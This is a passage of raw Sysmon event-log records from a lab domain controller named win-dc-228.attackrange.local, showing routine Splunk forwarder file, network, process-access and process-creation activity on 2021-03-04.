23542300x80000000000000002204635Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:04.808{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D93E983B73EA4ECAF5DBA140ED270449,SHA256=D5D99BD42D7C8599F4F38215F9F92786C0A4027BB848AB970CD70F7D2E907EBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204634Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:04.402{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A264E2BBDE9D78309541B4348E7527A,SHA256=DC86CD4BFC8D0E7A5820D5F4C69CE8AF46D72A07E982655D11BC6325C5673CD1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204633Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:59.910{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60766-false10.0.1.12-8000- 23542300x80000000000000002204636Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:05.808{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F91A111FEDD32F1C2CEA88D74DF598AD,SHA256=FCF835ED76294D73E0DE9354C8FDE4973C9D3A83CFF691968F9FA0D5EB76ED28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204638Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:06.933{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2B88B814545EC5E50AC9DAC29589E9D,SHA256=21D84E8B1B9295D90EA3A011BBFAF4B1162CD794E9C9CDBF98D255CDFA515A1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204637Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:06.824{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C556E0DAB653C5B91FF09C2D7A01DE84,SHA256=CA78B4E16C48983E4C12409C423A0D98D3E8F509D1479514430F0C86686AC528,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204642Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:07.933{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=38C1DE6DE4DA924982BFAA2F7498E134,SHA256=2356085B83C684716506134B5203D8FD298BEAF72B9ADE5686CAD3FC7B882DF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204641Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:07.824{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07ED4B10A57F4AC9E09062A233FD3B50,SHA256=E7497F1D1C5C2D129C84BD4513D829D0427CD2E1CC5BE11A83CFB4D8DBC1BFDA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204640Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:03.754{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53642- 23542300x80000000000000002204639Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:07.011{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204644Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:08.824{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3B281E741F9B40749C08E9F0217F094,SHA256=C561B6A8F4D58BE051BA1153DD86F695C3E75185F70312E1D150D861E8AE3B02,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204643Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:04.769{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53642- 23542300x80000000000000002204647Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:09.840{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E4BD4903ABB461EEF124002489AE9D1,SHA256=2E621A975D009D2015F02522544B39D8C8EF70493E66B01021C267D95A4AAD4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204646Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:09.105{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A8A697E46C01D74C46B486F3CD7D342,SHA256=0518456839B18BE095E34769C2CB982E55D1FD674A474079E2A881E249902A68,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204645Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:04.832{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60767-false10.0.1.12-8089- 23542300x80000000000000002204650Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:10.965{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F566CF75B1AC785DD1BB5159CA4B08B2,SHA256=91C7C4384F32BB1490804BEB2DE6D8D44965196BC626E26759F644052E7919C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204649Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:10.855{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E7E68A7A09C12935D72251810B98B90,SHA256=F9F9B157F30993E5672010D90A4335A01E8A8296FE5B07F90644C3FF9F03D5AE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204648Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:05.941{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60768-false10.0.1.12-8000- 23542300x80000000000000002204651Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:11.855{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8221D13A839A4179C21AA7658E1A8D6,SHA256=798D1B5197A8D1766895454F7A9BD99F2273F20DB8EC305029218539CE6936D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204652Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:12.871{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCBAA118C370ACEA678D5A8A7FC07576,SHA256=D3BC9E7B245C874AB7113ACEAAF46F7A298030256A85B7D13C2E04E157E67B13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204653Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:13.871{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB82ED01AEACF728E1D3578B40BD2C14,SHA256=65D9476C6525B76FF9C3FDD928B91B0562B18119F1A0E7D1ACA731D0EC6406D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204656Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:14.886{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CCB96F81930D28C49AEF1537ECB2806,SHA256=C7B0372A834CF9387A2644F75BCCF6F6F89881EA92A3A5FAE95E323B2D731778,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204655Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:10.988{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60769-false10.0.1.12-8000- 23542300x80000000000000002204654Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:14.168{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=023EBCBA51B52E5D75DC3409F8FFEB25,SHA256=5B79B22CF0269827F05F62ECFCC3191C9E5111FCFBBCEAB324DDD35F543A4FD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204657Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:15.886{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4478FBD0F84155F1419DBE4BE6085CB9,SHA256=FC8BF124EDA57865D780C08F1202D5EFDCAE9ED2AF78CC49BAAE83EE12851A6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204658Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:16.902{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB431158B29FFAABD1A98768A089B55C,SHA256=DC1E17C5FA0F9EE4398F24F9265E734805D981ED590618954E4D016097D494AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204667Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:17.918{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7AAE02F43898DD17FA01C05B8EBBC52,SHA256=EBB7A633BFC51B7918F9B2FE80E6BCE58E8B3BC0944BE8F2330AB27F388F143B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204666Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:17.480{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA85-6040-6E4E-00000000AD01}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204665Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:17.480{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204664Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:17.480{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204663Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:17.480{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204662Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:17.480{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204661Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:17.480{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-EA85-6040-6E4E-00000000AD01}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204660Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:17.480{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA85-6040-6E4E-00000000AD01}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204659Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:17.481{5ABCFE62-EA85-6040-6E4E-00000000AD01}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002204687Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.918{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AF3578E5224D7B4992D45F39A69DC8F,SHA256=7363A06F5267B63E14CC5268B5BC3D5986A166924979EBBECDFEE19E102F877D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204686Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.824{5ABCFE62-EA86-6040-704E-00000000AD01}64765832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204685Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.699{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA86-6040-704E-00000000AD01}6476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204684Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.699{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204683Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.699{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204682Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.699{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204681Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 